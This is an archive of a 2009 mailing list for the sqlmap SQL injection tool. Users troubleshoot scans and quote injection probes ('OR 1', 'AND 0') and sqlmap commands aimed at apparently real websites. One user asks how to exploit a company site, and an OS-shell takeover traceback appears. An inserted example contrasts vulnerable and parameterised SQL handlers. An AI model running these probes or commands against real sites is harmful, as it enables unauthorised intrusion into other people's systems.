> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...>
> wrote:
>>
>> Hello,
>>
>> I don't know why but a really really basic injection is not detected. The
>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>
>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>> THISISATEST it displays a mysql error.
>>
>> So it's definitely injectable and that's not a "rare" type of injection.
>>
>> Now I would like to learn to use sqlmap to find these injections and how
>> to use it but when I'm doing this :
>>
>> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4" -v 1
>>
>> It says that both news_id and zone_id aren't injectable ! I tried using
>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>
>> I don't think that sqlmap can't detect such basic injections, so could you
>> tell me what are the proper parameters to detect something simple like that,
>> and then how to exploit it ?
>>
>> Thanks :) |
From: Patrick W. <pa...@au...> - 2009-09-17 16:08:05
|
It is probably not a good idea to attack http://www.siig.fr

-Patrick

On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...> wrote:
> Hello,
>
> I don't know why but a really really basic injection is not detected. The
> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>
> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
> THISISATEST it displays a mysql error.
>
> So it's definitely injectable and that's not a "rare" type of injection.
>
> Now I would like to learn to use sqlmap to find these injections and how to
> use it but when I'm doing this :
>
> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4" -v 1
>
> It says that both news_id and zone_id aren't injectable ! I tried using
> the -p parameter like that : -p zone_id but it doesn't change anything.
>
> I don't think that sqlmap can't detect such basic injections, so could you
> tell me what are the proper parameters to detect something simple like that,
> and then how to exploit it ?
>
> Thanks :) |
From: Adrien L. <lem...@gm...> - 2009-09-16 14:47:46
|
your example was user and password. I've looked into tamper data and have seen that variables were user and pass. So what do you think about it ?

Thank you a lot for your help, Erik !

On Wed, Sep 16, 2009 at 2:10 PM, Erik Nilsson <da...@gm...> wrote:
> This was just an example of variables to use. You have to identify the
> variables on your own for each url.
> A good tool for this is the "Tamper data" plug in for Firefox.
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 1:52 PM
> Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
> To: Erik Nilsson <da...@gm...>
> Cc: sql...@li...
>
> Ok, I have already tried with --data option, but I've put
> "user=user;pass=pass" instead of "user=user&pass=pass", mistake.
>
> So I've retried and the output is :
>
> > $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&pass=password"
> >
> > sqlmap/0.7
> > by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 13:43:07
> >
> > [13:43:07] [INFO] testing connection to the target url
> > [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> > [13:43:08] [INFO] url is stable
> > [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> > [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> > [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> > [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> > [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 13:43:08
>
> So I suppose that there is no injection vulnerability, and I should
> use another tool ?
>
> On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
> >
> > You'll need to enter GET and/or POST values like
> >
> > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&password=password"
> >
> > OR
> >
> > sqlmap-0.7 $ python sqlmap.py --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
> >
> > ---------- Forwarded message ----------
> > From: Adrien LEMAIRE <lem...@gm...>
> > Date: Wed, Sep 16, 2009 at 11:35 AM
> > Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> > To: sql...@li...
> >
> > Hi everyone,
> >
> > I'm new to this list mail :)
> > I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> > and tried to launch it :
> >
> > > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> > >
> > > sqlmap/0.7
> > > by Bernardo Damele A. G. <ber...@gm...>
> > >
> > > [*] starting at: 11:13:17
> > >
> > > [11:13:17] [INFO] testing connection to the target url
> > > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > > [11:13:19] [INFO] url is stable
> > > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> > >
> > > [*] shutting down at: 11:13:19
> >
> > This website is a french site for hacking challenges, and I wanted to
> > try if sqlmap couldn't bruteforce the login/password.
> > But I thought that sqlmap will also test for GET, POST and Cookie
> > before shutting down if nothing is dynamic.
> >
> > Reference to user manual :
> > >
> > > Let's say that you are auditing a web application and found a web page
> > > that accepts dynamic user-provided values on GET or POST parameters or HTTP
> > > Cookie values or HTTP User-Agent header value.
> >
> > Did I misunderstand something ? Do you think I forgot to configure
> > something in sqlmap config files ? (I haven't modified any file yet).
> >
> > Thank you a lot for your answer, and sorry for disturbing.
> > Best regards,
> > Adrien Lemaire |
From: Erik N. <da...@gm...> - 2009-09-16 12:10:44
|
This was just an example of variables to use. You have to identify the variables on your own for each url.
A good tool for this is the "Tamper data" plug in for Firefox.

---------- Forwarded message ----------
From: Adrien LEMAIRE <lem...@gm...>
Date: Wed, Sep 16, 2009 at 1:52 PM
Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
To: Erik Nilsson <da...@gm...>
Cc: sql...@li...

Ok, I have already tried with --data option, but I've put "user=user;pass=pass" instead of "user=user&pass=pass", mistake.

So I've retried and the output is :

> $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&pass=password"
>
> sqlmap/0.7
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 13:43:07
>
> [13:43:07] [INFO] testing connection to the target url
> [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> [13:43:08] [INFO] url is stable
> [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 13:43:08

So I suppose that there is no injection vulnerability, and I should use another tool ?

On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
>
> You'll need to enter GET and/or POST values like
>
> sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&password=password"
>
> OR
>
> sqlmap-0.7 $ python sqlmap.py --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 11:35 AM
> Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> To: sql...@li...
>
> Hi everyone,
>
> I'm new to this list mail :)
> I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> and tried to launch it :
>
> > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> >
> > sqlmap/0.7
> > by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 11:13:17
> >
> > [11:13:17] [INFO] testing connection to the target url
> > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > [11:13:19] [INFO] url is stable
> > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 11:13:19
>
> This website is a french site for hacking challenges, and I wanted to
> try if sqlmap couldn't bruteforce the login/password.
> But I thought that sqlmap will also test for GET, POST and Cookie
> before shutting down if nothing is dynamic.
>
> Reference to user manual :
> >
> > Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.
>
> Did I misunderstand something ? Do you think I forgot to configure
> something in sqlmap config files ? (I haven't modified any file yet).
>
> Thank you a lot for your answer, and sorry for disturbing.
> Best regards,
> Adrien Lemaire |
From: Adrien L. <lem...@gm...> - 2009-09-16 11:52:46
|
Ok, I have already tried with --data option, but I've put "user=user;pass=pass" instead of "user=user&pass=pass", mistake.

So I've retried and the output is :

> $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&pass=password"
>
> sqlmap/0.7
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 13:43:07
>
> [13:43:07] [INFO] testing connection to the target url
> [13:43:07] [INFO] testing if the url is stable, wait a few seconds
> [13:43:08] [INFO] url is stable
> [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
> [13:43:08] [WARNING] POST parameter 'user' is not dynamic
> [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
> [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
> [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 13:43:08

So I suppose that there is no injection vulnerability, and I should use another tool ?

On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
> You'll need to enter GET and/or POST values like
>
> sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&password=password"
>
> OR
>
> sqlmap-0.7 $ python sqlmap.py --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>
> ---------- Forwarded message ----------
> From: Adrien LEMAIRE <lem...@gm...>
> Date: Wed, Sep 16, 2009 at 11:35 AM
> Subject: [sqlmap-users] sqlmap stop after testing User-Agent
> To: sql...@li...
>
> Hi everyone,
>
> I'm new to this list mail :)
> I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
> and tried to launch it :
>
> > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
> >
> > sqlmap/0.7
> > by Bernardo Damele A. G. <ber...@gm...>
> >
> > [*] starting at: 11:13:17
> >
> > [11:13:17] [INFO] testing connection to the target url
> > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> > [11:13:19] [INFO] url is stable
> > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> >
> > [*] shutting down at: 11:13:19
>
> This website is a french site for hacking challenges, and I wanted to
> try if sqlmap couldn't bruteforce the login/password.
> But I thought that sqlmap will also test for GET, POST and Cookie
> before shutting down if nothing is dynamic.
>
> Reference to user manual :
> >
> > Let's say that you are auditing a web application and found a web page
> > that accepts dynamic user-provided values on GET or POST parameters or HTTP
> > Cookie values or HTTP User-Agent header value.
>
> Did I misunderstand something ? Do you think I forgot to configure
> something in sqlmap config files ? (I haven't modified any file yet).
>
> Thank you a lot for your answer, and sorry for disturbing.
> Best regards,
> Adrien Lemaire |
From: Erik N. <da...@gm...> - 2009-09-16 11:38:10
|
You'll need to enter GET and/or POST values like

sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&password=password"

OR

sqlmap-0.7 $ python sqlmap.py --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"

---------- Forwarded message ----------
From: Adrien LEMAIRE <lem...@gm...>
Date: Wed, Sep 16, 2009 at 11:35 AM
Subject: [sqlmap-users] sqlmap stop after testing User-Agent
To: sql...@li...

Hi everyone,

I'm new to this list mail :)
I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu, and tried to launch it :

> sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>
> sqlmap/0.7
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 11:13:17
>
> [11:13:17] [INFO] testing connection to the target url
> [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> [11:13:19] [INFO] url is stable
> [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 11:13:19

This website is a french site for hacking challenges, and I wanted to try if sqlmap couldn't bruteforce the login/password.
But I thought that sqlmap will also test for GET, POST and Cookie before shutting down if nothing is dynamic.

Reference to user manual :

> Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.

Did I misunderstand something ? Do you think I forgot to configure something in sqlmap config files ? (I haven't modified any file yet).

Thank you a lot for your answer, and sorry for disturbing.
Best regards,
Adrien Lemaire |
From: Adrien L. <lem...@gm...> - 2009-09-16 09:35:39
|
Hi everyone,

I'm new to this list mail :)
I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu, and tried to launch it :

> sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>
> sqlmap/0.7
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 11:13:17
>
> [11:13:17] [INFO] testing connection to the target url
> [11:13:17] [INFO] testing if the url is stable, wait a few seconds
> [11:13:19] [INFO] url is stable
> [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>
> [*] shutting down at: 11:13:19

This website is a french site for hacking challenges, and I wanted to try if sqlmap couldn't bruteforce the login/password. But I thought that sqlmap will also test for GET, POST and Cookie before shutting down if nothing is dynamic.

Reference to user manual :

> Let's say that you are auditing a web application and found a web page that
> accepts dynamic user-provided values on GET or POST parameters or HTTP
> Cookie values or HTTP User-Agent header value.

Did I misunderstand something ? Do you think I forgot to configure something in sqlmap config files ? (I haven't modified any file yet).

Thank you a lot for your answer, and sorry for disturbing.
Best regards,
Adrien Lemaire |
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-13 21:56:37
|
Hi Kyle,

On Mon, Sep 7, 2009 at 00:59, Kyle Anderson <ky...@xk...> wrote:
> ...
> Can anyone think of a way to use sqlmap in a situation with clean urls
> using mod_rewrite? (Which is very popular now-a-days)
>
> An example might be my mythtv web interface:
> http://192.168.1.1/mythweb/tv/detail/1004/1252278000
>
> Internally it is reading the module, chanid, and start time from the
> url. It is NOT possible to use something like
> index.php?chanid=104&time=1254...
>
> Is there any way to use sqlmap in this situation?

Not yet. This enhancement will be implemented sometime.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
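Added example, not part of the original message and not MythWeb or sqlmap code: a clean URL only moves the parameters into path segments, so the handler behind the rewrite rule needs the same input handling as one reading `?chanid=...`. The `program` table, both handler functions and the sample rows are assumptions made for illustration, sqlite3 stands in for the real back end, and the three probe suffixes are the ones quoted in the `news_id` thread on this page.

```python
import re
import sqlite3
from urllib.parse import unquote

PREFIX = "/mythweb/tv/detail/"  # clean-URL form quoted in the thread


def make_db():
    """In-memory stand-in for the back end; rows are constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE program (chanid INTEGER, starttime INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO program VALUES (?, ?, ?)",
        [
            (1004, 1252278000, "Evening News"),
            (1004, 1252281600, "Late Film"),
            (1007, 1252278000, "Documentary"),
        ],
    )
    return db


def split_clean_url(path):
    """Do what the rewrite rule does: map path segments to (chanid, starttime)."""
    if not path.startswith(PREFIX):
        raise ValueError("not a detail URL")
    # Split first, decode second, so an encoded '/' cannot add a segment.
    segments = [unquote(s) for s in path[len(PREFIX):].split("/")]
    if len(segments) != 2:
        raise ValueError("expected /<chanid>/<starttime>")
    return segments[0], segments[1]


def detail_vulnerable(db, path):
    """Hypothetical handler that pastes the path segments into the SQL text."""
    chanid, starttime = split_clean_url(path)
    sql = ("SELECT title FROM program WHERE chanid = %s AND starttime = %s"
           % (chanid, starttime))
    return [row[0] for row in db.execute(sql)]


_UINT = re.compile(r"[0-9]{1,10}")


def detail_hardened(db, path):
    """Same lookup: segments must be unsigned integers and are bound as parameters."""
    chanid, starttime = split_clean_url(path)
    if not (_UINT.fullmatch(chanid) and _UINT.fullmatch(starttime)):
        raise ValueError("path segment is not an unsigned integer")
    cur = db.execute(
        "SELECT title FROM program WHERE chanid = ? AND starttime = ?",
        (int(chanid), int(starttime)),
    )
    return [row[0] for row in cur]


def observe(handler, path):
    """Classify one request the way a regression test for the handler would."""
    db = make_db()
    try:
        return handler(db, path)
    except sqlite3.Error:
        return "sql-error"   # the database was handed malformed SQL
    except ValueError:
        return "rejected"    # input stopped before it reached the database
    finally:
        db.close()


if __name__ == "__main__":
    base = PREFIX + "1004/1252278000"
    for suffix in ("", "%20OR%201", "%20AND%200", "%20THISISATEST"):
        print(repr(suffix),
              observe(detail_vulnerable, base + suffix),
              observe(detail_hardened, base + suffix))
```
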
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-13 21:45:27
|
Hi James,

On Thu, Aug 20, 2009 at 02:00, <ja...@ev...> wrote:
> ...
> sqlmap version: 0.8-dev1
> Python version: 2.4.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlhax", line 84, in main
>     start()
>   File "/nfs/sqlmap/lib/controller/controller.py", line 263, in start
>     action()
>   File "/nfs/sqlmap/lib/controller/action.py", line 140, in action
>     conf.dbmsHandler.osShell()
>   File "/nfs/sqlmap/plugins/generic/takeover.py", line 300, in osShell
>     self.initEnv()
>   File "/nfs/sqlmap/lib/takeover/abstraction.py", line 168, in initEnv
>     self.xpCmdshellInit(mandatory)
>   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 181, in xpCmdshellInit
>     self.__xpCmdshellConfigure(1)
>   File "/nfs/sqlmap/lib/takeover/xp_cmdshell.py", line 106, in __xpCmdshellConfigure
>     if kb.dbmsVersion[0] in ( "2005", "2008" ):
> IndexError: list index out of range

This happens because for some reason, sqlmap was not able to identify the version of MSSQL some lines before. You can force the dbms version if you know it with the --dbms option. Simply provide --dbms "mssql 200X".

> Also, for anyone on the list who is actually interested check out this
> cheat sheet, its pretty awesome.
>
> http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

You can also have a look at my links on http://delicious.com/inquis/sqlinjection.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2009-09-13 21:41:45
|
Hi ehmo,

On Sun, Aug 16, 2009 at 01:45, ehmo <dis...@gm...> wrote:
> Hey guys,
> i'm very curious about this thing.
>
> If back-end DB is MySQL < 5.0, SQLmap will always stop table lookup
> with this error.
> [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
>
> but this MySQL version doesn't have information_schema and i'm
> curious, why it will not try to guess all tables. Or is there any way in
> SQLmap to get the list of tables, if information_schema is not
> available?

information_schema is not available by design in any MySQL < 5.0, sqlmap is then not able to rely on it to enumerate information like databases, table names, columns, etc.
sqlmap does not have an option to brute-force table names. Although, you can provide database name (-D), table name (-T) and column name(s) (-C) to use to dump entries from.

> Also, you should add an option for injecting the referer, because
> sometimes the sqli is there and sqlmap doesn't know this method.

This will come in the long run.

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F |